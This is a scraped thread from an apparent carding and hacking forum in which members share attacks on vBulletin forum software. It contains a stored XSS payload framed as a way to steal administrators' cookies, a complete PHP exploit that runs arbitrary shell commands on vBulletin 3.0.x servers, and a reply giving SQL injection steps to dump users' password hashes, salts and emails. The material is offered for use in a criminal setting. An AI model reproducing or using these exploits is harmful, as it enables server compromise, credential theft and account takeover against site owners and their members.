Sangteamtham/vBulletin 4.2.0 Cross Site Scripting | Carders Forum, Carding forum, Hacking Forum - verifiedcarder.ws
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
  2. For support & Advertisment Contact 

     Jabber   vcarder@inbox.im & ICQ481-465

  3. If Guest goes direct with seller without ESCROW 
    We will not held responsible any damages or loss 
    We will not provide support in dispute resolution

Sangteamtham/vBulletin 4.2.0 Cross Site Scripting

Discussion in 'Vulnerabilities & Bugs' started by _Mike74, Mar 11, 2013.

  1. [FONT=IPAex&#12468][TABLE="width: 1"]
    [TR]
    [TD="class: code"]$------------------------------------------------------------------------------------------------------------
    $ vBulletin 4.2.0 XSS Vulnerability
    $ Author : sangteamtham
    $ Home : Hcegroup.vn
    $ Download: http://members.vbulletin.com/
    $ Date :06/13/2012
    $ Google Dork: "Powered by vBulletin? Version 4.2.0"
    $ Twitter: http://twitter.com/Sangte_amtham
    $*************************************************************************************************************
    1.vBulletin Description:

    Content publishing, search, security, and more— vBulletin has it all.
    Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money.
    Learn more about what makes vBulletin the choice for people who are serious about creating
    thriving online communities.

    2. Vulnerability Description:

    To steal cookie from administrator or any member in a forum or drive them to malicious sites, attacker will firstly create an account, then come to
    calendar section, and create an event for himself.

    In title, he will inject XSS code there. For sample:

    "><img src=x onerror=alert(1)>

    In content section, he will write everything he likes. Now, he will send his profile to Administrator or any member
    and wait for cookie or victims' infection.

    http://127.0.0.1/vbb/member.php?id-xyz

    3. Patch:

    June 13, 2012: Contacted the vendor.
    June 14, 2012: Vendor replied me.
    June 18, 2012: the vendor released the patch for this vulnerabitily. Please download it from member Area right now.

    https://members.vbulletin.com/patches.php

    $**************************************************************************************************************
    $ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
    $
    $
    $---------------------------------------------------------------------------------------------------------------

    [/TD]
    [/TR]
    [/TABLE]




    vBulletin version 4.2.0 suffers from a persistent cross site scripting vulnerability in the calendar section.[/FONT]

    [FONT=IPAex&#12468][h=2]AL3NDALEEB/vbulletin-3.0.4-2.txt ( na)[/h][COLOR=white !important]?
    [TABLE="width: 1"]
    [TR="bgcolor: #F8F8F8"]
    [TD="class: gutter"]
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66​
    [/TD]
    [TD="class: code"]<?php
    /**************************************************************
    #
    # vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
    #
    # First condition : $vboptions['showforumusers'] == True , the admin must set
    # showforumusers ON in vbulletin options.
    # Second condition: $bbuserinfo['userid'] == 0 , you must be an visitor/guest .
    # Third condition : $DB_site->fetch_array($forumusers) == True , when you
    # visit the forums, it must has at least
    # one user show the forum.
    # Fourth condition: magic_quotes_gpc must be OFF
    #
    # Vulnerable Systems:
    # vBulletin version 3.0 up to and including version 3.0.4
    #
    # Immune systems:
    # vBulletin version 3.0.5
    # vBulletin version 3.0.6
    #
    **************************************************************/

    if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
    }

    if ($argv[3]){
    $url = $argv[1];
    $forumid = intval($argv[2]);
    $command = $argv[3];
    }
    else {
    echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
    echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
    echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
    echo "<forumid> forum id\n";
    echo "<command> command to execute on server (ex: 'ls -la')\n";
    echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
    echo "ex :\n";
    echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

    exit;
    }

    if ($argv[4])
    $proxy = $argv[4];



    $action = 'forumdisplay.php?GLOBALS[]=1&amp;f='.$forumid.'&amp;comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

    $ch=curl_init();
    if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
    }
    curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $res=curl_exec ($ch);
    curl_close ($ch);
    $res = substr($res, strpos($res, '_START_')+7);
    $res = substr($res,0, strpos($res, '_END_'));
    echo $res;


    ?>

    [/TD]
    [/TR]
    [/TABLE]



    [/FONT][/COLOR]
     
  2. sushi007

    sushi007 Premium User

    Joined:
    Apr 12, 2016
    Messages:
    4
    Likes Received:
    0
    THERE IS ANOTHER HACK OF VBULLETIN 4 (4.0.x,4.1.1,4.1.2)

    1. in community section last maked group name
    2.copy the name and search it in /search.php
    3.open live http header and reply header with this
    &cat[0]=1) UNION SELECT concat_ws(0x3a,username,password,salt,em*ail) FROM user limit 1,1#





    u got pass username of owner
     
  3. Ó Rábbít Wilcox

    Registered

    Joined:
    Jul 22, 2017
    Messages:
    6
    Likes Received:
    0
    nice thanks for share
     

Users found this page by searching for:

  1. How to steal cookie from vbulletin